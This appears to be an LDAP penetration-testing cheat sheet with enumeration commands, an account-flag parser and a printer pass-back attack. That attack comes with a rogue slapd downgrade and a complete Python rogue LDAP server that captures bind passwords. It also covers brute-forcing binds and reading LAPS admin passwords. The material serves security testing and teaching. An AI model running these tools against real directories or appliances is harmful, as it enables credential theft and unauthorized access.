# LDAP (Lightweight Directory Access Protocol) Pentesting

LDAP is the standard protocol for querying and modifying "directory services" such as Active Directory. Default ports are 389 (LDAP, plaintext or StartTLS), 636 (LDAPS), 3268 (LDAP to the Global Catalog) and 3269 (Global Catalog over SSL/TLS).

### Enumeration <a href="#enumeration" id="enumeration"></a>

```
# Nmap
# ldap-brute guesses simple-bind credentials under the given base DN (noisy: every guess is a failed logon)
nmap --script ldap-brute --script-args ldap.base='"cn=users,dc=cqure,dc=net"' -p 389 <target-ip>
# ldap-search: anonymous search of the root DSE and the default naming context
nmap --script ldap-search -p 389 <target-ip>
# quote the glob so the shell does not expand it against local filenames
nmap --script "ldap-*" -p 389 <target-ip>
nmap --script "ldap* and not brute" -p 389 <target-ip>

# NetExec
# -k: Use Kerberos authentication
netexec ldap <target-ip> -u usernames.txt -k
# --trusted-for-delegation: Enumerate computers and users with the flag `TRUSTED_FOR_DELEGATION`
# reference: https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties#property-flag-descriptions
netexec ldap <target-ip> -u username -p password --trusted-for-delegation

# Users
# -LLL: plain LDIF without comments or version line
# objectCategory=person excludes computer accounts, which are also objectClass=user
# userAccountControl carries the account flags (delegation, pre-auth, disabled, ...)
ldapsearch -x -LLL -H ldap://10.0.0.1 -D "username@example.local" -w "password" -b "dc=example,dc=local" "(&(objectCategory=person)(objectClass=user))" sAMAccountName memberOf userAccountControl
# Groups
ldapsearch -x -LLL -H ldap://10.0.0.1 -D "username@example.local" -w "password" -b "dc=example,dc=local" "(objectClass=group)" name member
```
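Reading the raw ldapsearch output by eye does not scale past a handful of users. The Python below is an added example, not code from the original page: it parses LDIF the way ldapsearch prints it (unfolding continuation lines and decoding `attr:: base64` values), decodes the `userAccountControl` bits from the Microsoft reference linked above, and lists the enabled accounts that carry a flag worth a second look: the `TRUSTED_FOR_DELEGATION` accounts NetExec's `--trusted-for-delegation` reports, plus `DONT_REQ_PREAUTH` (AS-REP roastable) and `PASSWD_NOTREQD`. It assumes the users query also requested `userAccountControl`; the domain, accounts, groups and flag values in `SAMPLE_LDIF` are constructed for the example.

```python
import base64
import re

# userAccountControl bits, from Microsoft's documented property flags (same reference as above).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x400000: "DONT_REQ_PREAUTH",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}
# Flags that make an enabled account worth a closer look during enumeration.
REVIEW_FLAGS = ("TRUSTED_FOR_DELEGATION", "TRUSTED_TO_AUTH_FOR_DELEGATION",
                "DONT_REQ_PREAUTH", "PASSWD_NOTREQD")

# Constructed sample of what ldapsearch prints for the users query. The DN with umlauts is
# base64-encoded at import time because ldapsearch emits non-ASCII values as "attr:: <base64>".
_B64_DN = base64.b64encode("CN=Jörg Müller,OU=Users,DC=example,DC=local".encode()).decode()
SAMPLE_LDIF = f"""\
# extended LDIF
#
# LDAPv3
# base <dc=example,dc=local> with scope subtree
# filter: (&(objectCategory=person)(objectClass=user))
# requesting: sAMAccountName memberOf userAccountControl
#

# svc-backup, Service Accounts, example.local
dn: CN=svc-backup,OU=Service Accounts,DC=example,DC=local
sAMAccountName: svc-backup
memberOf: CN=Backup Operators,CN=Builtin,DC=example,DC=local
userAccountControl: 590336

# svc-web, Service Accounts, example.local
dn: CN=svc-web,OU=Service Accounts,DC=example,DC=local
sAMAccountName: svc-web
memberOf: CN=Remote Management Users,CN=Builtin,DC=example,DC=local
memberOf: CN=Web Admins,OU=Groups,DC=example,
 DC=local
userAccountControl: 4260352

# jmueller, Users, example.local
dn:: {_B64_DN}
sAMAccountName: jmueller
memberOf: CN=Domain Users,CN=Users,DC=example,DC=local
userAccountControl: 514

# search result
search: 2
result: 0 Success

# numResponses: 4
# numEntries: 3
"""


def parse_ldif(text):
    """Parse ldapsearch LDIF output into a list of {attribute: [values]} dicts.

    Handles folded lines (a line starting with one space continues the previous one),
    base64 values ("attr:: ...") and comment lines. Blocks without a dn (the trailing
    "search:/result:" summary) are dropped."""
    text = re.sub(r"\n ", "", text)          # unfold continuation lines
    entries, current = [], {}
    for line in text.splitlines() + [""]:    # sentinel blank line flushes the last entry
        if not line.strip():
            if "dn" in current:
                entries.append(current)
            current = {}
            continue
        if line.startswith("#"):
            continue
        attr, sep, value = line.partition(":")
        if not sep:
            continue
        if value.startswith(":"):            # "attr:: base64"
            value = base64.b64decode(value[1:].strip()).decode("utf-8", errors="replace")
        else:
            value = value.strip()
        current.setdefault(attr, []).append(value)
    return entries


def decode_uac(value):
    """Names of the set userAccountControl bits, in ascending bit order."""
    bits = int(value)
    return [name for bit, name in UAC_FLAGS.items() if bits & bit]


def interesting_accounts(entries):
    """(sAMAccountName, review flags, memberOf) for enabled accounts carrying a REVIEW_FLAGS bit."""
    found = []
    for entry in entries:
        if "userAccountControl" not in entry:
            continue
        flags = decode_uac(entry["userAccountControl"][0])
        if "ACCOUNTDISABLE" in flags:
            continue
        hits = [f for f in flags if f in REVIEW_FLAGS]
        if hits:
            found.append((entry.get("sAMAccountName", ["?"])[0], hits, entry.get("memberOf", [])))
    return found


if __name__ == "__main__":
    for name, hits, groups in interesting_accounts(parse_ldif(SAMPLE_LDIF)):
        print(f"{name}: {', '.join(hits)}  (member of {len(groups)} groups)")
```

To use it against a real dump, redirect the users ldapsearch command above to a file and feed its contents to `parse_ldif`; the parser does not care whether `-LLL` was used, since comment and summary blocks are skipped either way.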

### Dump Active Directory Information <a href="#dump-active-directory-information" id="dump-active-directory-information"></a>

With valid domain credentials, ldapdomaindump pulls users, groups, computers, policies and trusts over LDAP and writes them out as JSON, HTML and grep-able TSV (the last two can be disabled).

```
# --no-html: Disable html output
# --no-grep: Disable greppable output
# -o: Output dir (the JSON files are always written there)
ldapdomaindump -u 'DOMAIN\username' -p password <target-ip> --no-html --no-grep -o dumped
```

### NetExec Modules <a href="#connect" id="connect"></a>

#### AD CS (Active Directory Certificate Services) <a href="#a-d-cs-active-directory-certificate-services" id="a-d-cs-active-directory-certificate-services"></a>

```
# -M adcs: list certificate authorities and enrollment endpoints published in the directory
netexec ldap <target-ip> -d 'domain' -u 'username' -p 'password' -M adcs
```

#### LAPS (Local Administrator Password Solution) <a href="#laps-local-administrator-password-solution" id="laps-local-administrator-password-solution"></a>

```
# -M laps: read LAPS local admin passwords for every computer the account may read them on
# --kdcHost: name/IP of the domain controller to use as KDC
netexec ldap <target-ip> -d 'domain' -u 'username' -p 'password' --kdcHost <target-ip> -M laps
```

### Pass-Back Attack <a href="#pass-back-attack" id="pass-back-attack"></a>

Printers, scanners and similar appliances often store an LDAP service account for address-book lookups or user authentication, and their web interface lets anyone with admin access change the LDAP server address and run a "test connection". Point that setting at your own host and the device binds to you with the stored credentials.\
For example, access <http://printer.sub.example.com/settings.aspx>

Open a listener on your machine. The `-l` flag is required (without it netcat connects out instead of listening); use port 389 with sudo if the device does not let you change the port.

```
nc -lvnp 1389
```

In the device's LDAP settings, set the server to your IP and the port to 1389, leave the stored credentials in place, and trigger the test. If the device performs a simple bind, the DN and password arrive in clear text in netcat's output.

#### Host Rogue LDAP Server <a href="#host-rogue-ldap-server" id="host-rogue-ldap-server"></a>

If the device sends nothing useful to a bare netcat listener (for example because it negotiates a SASL mechanism or expects a real LDAP handshake before it will send a password), run a rogue LDAP server and downgrade it to plaintext authentication.\
Install the dependencies first.

```
sudo apt update
sudo apt install -y slapd ldap-utils
sudo systemctl enable slapd
```

Configure your own rogue LDAP server by executing the following command.

```
sudo dpkg-reconfigure -p low slapd

# ---------------------------------------------------

# in configuration dialog

1. Omit OpenLDAP server configuration: No
2. DNS domain name: <target-domain>
3. Organization name: <target-domain>
4. Administrator password: <arbitrary-password>
5. Database backend to use: MDB
6. Do you want the database to be removed when slapd is purged?: No
7. Move old database?: Yes
```

Make the rogue server ask for plaintext credentials by downgrading its SASL security properties: `minssf=0` allows mechanisms with no security layer and `passcred` selects mechanisms that pass the client's credentials through (PLAIN and LOGIN), so the device hands over the password in clear.\
Create the config file named "config.ldif".

```
dn: cn=config
changetype: modify
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred
```

Apply it to the running server over the local ldapi:// socket; with sudo, SASL EXTERNAL authenticates as the local root user, which the default cn=config ACL on Debian/Ubuntu allows to manage the configuration.

```
# -Y EXTERNAL: SASL EXTERNAL mechanism (authenticate as the Unix identity of the caller)
# -H ldapi://: talk to slapd over its local Unix socket
sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./config.ldif
sudo service slapd restart
```

Verify that the change took effect; the root DSE should now advertise PLAIN and LOGIN:

```
ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms
```

Capture the bind on the interface that faces the device; `-X` prints the packet payload in hex and ASCII, so a simple bind's DN and password are readable in the dump.

```
sudo tcpdump -SX -i <target-interface-like-eth0> tcp port 389
```

Back in the printer's web interface, set the LDAP server to your host on port 389 and run the test again; the credentials show up in the tcpdump output.
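For the simple-bind case the whole procedure (the netcat listener above and the slapd plus tcpdump capture) can be replaced by a few dozen lines that speak just enough LDAP. The Python below is an added example, not code from the original page: it listens like the netcat step, decodes the BER-encoded `BindRequest` the device sends, prints a simple bind's DN and password, and answers with a `BindResponse` of `success` so the device reports the test as passed. When the device offers a SASL mechanism instead there is no plaintext to capture; the script prints the mechanism name and replies `authMethodNotSupported`. It uses only the standard library, the tags and result codes come from RFC 4511, and the DN, password and port 1389 used for the sample bind are made up.

```python
import socket

# Tags used by LDAPMessage / BindRequest / BindResponse (RFC 4511, BER with implicit tagging).
SEQUENCE, INTEGER, OCTET_STRING, ENUMERATED = 0x30, 0x02, 0x04, 0x0A
BIND_REQUEST, BIND_RESPONSE = 0x60, 0x61        # [APPLICATION 0] / [APPLICATION 1]
AUTH_SIMPLE, AUTH_SASL = 0x80, 0xA3             # AuthenticationChoice simple [0] / sasl [3]
RESULT_SUCCESS, RESULT_AUTH_METHOD_NOT_SUPPORTED = 0, 7


def ber_len(n):
    """BER length: short form below 128, long form (0x80|N followed by N length bytes) above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag, payload):
    """One tag-length-value element."""
    return bytes([tag]) + ber_len(len(payload)) + payload


def ber_int(value):
    """INTEGER in minimal two's-complement form (enough for message IDs and the version)."""
    return tlv(INTEGER, value.to_bytes(max(1, (value.bit_length() + 8) // 8), "big", signed=True))


def read_tlv(buf, pos=0):
    """Decode the element at pos; return (tag, value bytes, position after it)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                           # long-form length
        nbytes = length & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    if pos + length > len(buf):
        raise ValueError("truncated BER element")
    return tag, buf[pos:pos + length], pos + length


def build_simple_bind(msg_id, dn, password):
    """What a device configured for simple LDAP authentication sends: DN and password in clear."""
    op = ber_int(3) + tlv(OCTET_STRING, dn.encode()) + tlv(AUTH_SIMPLE, password.encode())
    return tlv(SEQUENCE, ber_int(msg_id) + tlv(BIND_REQUEST, op))


def parse_bind(msg):
    """Pull message ID, DN and either the password (simple) or SASL mechanism out of a BindRequest."""
    tag, body, _ = read_tlv(msg)
    if tag != SEQUENCE:
        raise ValueError("not an LDAPMessage")
    _, mid, pos = read_tlv(body)
    tag, op, _ = read_tlv(body, pos)
    if tag != BIND_REQUEST:
        raise ValueError(f"expected BindRequest, got tag 0x{tag:02x}")
    info = {"msg_id": int.from_bytes(mid, "big", signed=True), "dn": None, "password": None, "mechanism": None}
    _, _, pos = read_tlv(op)                    # version INTEGER, not needed here
    _, dn, pos = read_tlv(op, pos)
    tag, cred, _ = read_tlv(op, pos)
    info["dn"] = dn.decode(errors="replace")
    if tag == AUTH_SIMPLE:
        info["password"] = cred.decode(errors="replace")
    elif tag == AUTH_SASL:
        # SaslCredentials ::= SEQUENCE { mechanism, credentials OPTIONAL }; [3] wraps it directly
        _, mech, _ = read_tlv(cred)
        info["mechanism"] = mech.decode(errors="replace")
    return info


def build_bind_response(msg_id, result_code=RESULT_SUCCESS):
    """BindResponse with the given resultCode and empty matchedDN / diagnosticMessage."""
    result = tlv(ENUMERATED, bytes([result_code])) + tlv(OCTET_STRING, b"") + tlv(OCTET_STRING, b"")
    return tlv(SEQUENCE, ber_int(msg_id) + tlv(BIND_RESPONSE, result))


def serve(port=1389):
    """Listen as a fake LDAP server, log every bind, and tell the device the bind succeeded."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("0.0.0.0", port))
        srv.listen(5)
        print(f"[*] rogue LDAP listener on :{port}")
        while True:
            conn, peer = srv.accept()
            with conn:
                data = conn.recv(65535)
                if not data:
                    continue
                try:
                    info = parse_bind(data)
                except (ValueError, IndexError) as exc:
                    print(f"[-] {peer[0]}: {exc}")
                    continue
                if info["password"] is not None:
                    print(f"[+] {peer[0]} simple bind dn={info['dn']!r} password={info['password']!r}")
                    conn.sendall(build_bind_response(info["msg_id"], RESULT_SUCCESS))
                else:
                    # SASL: the secret is not on the wire. Refuse the mechanism; whether the device
                    # then retries with a simple bind is device-specific.
                    print(f"[!] {peer[0]} SASL bind ({info['mechanism']}) dn={info['dn']!r}; nothing in clear")
                    conn.sendall(build_bind_response(info["msg_id"], RESULT_AUTH_METHOD_NOT_SUPPORTED))


if __name__ == "__main__":
    serve()
```

Run it with `sudo` and `serve(389)` if the device cannot be pointed at a non-standard port. `build_simple_bind` exists so the decoder can be exercised offline against a bind constructed the same way a device would send it; the SASL branch is what a `[!]` line in the output means: fall back to the slapd downgrade above, since the credential never crosses the wire in clear.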
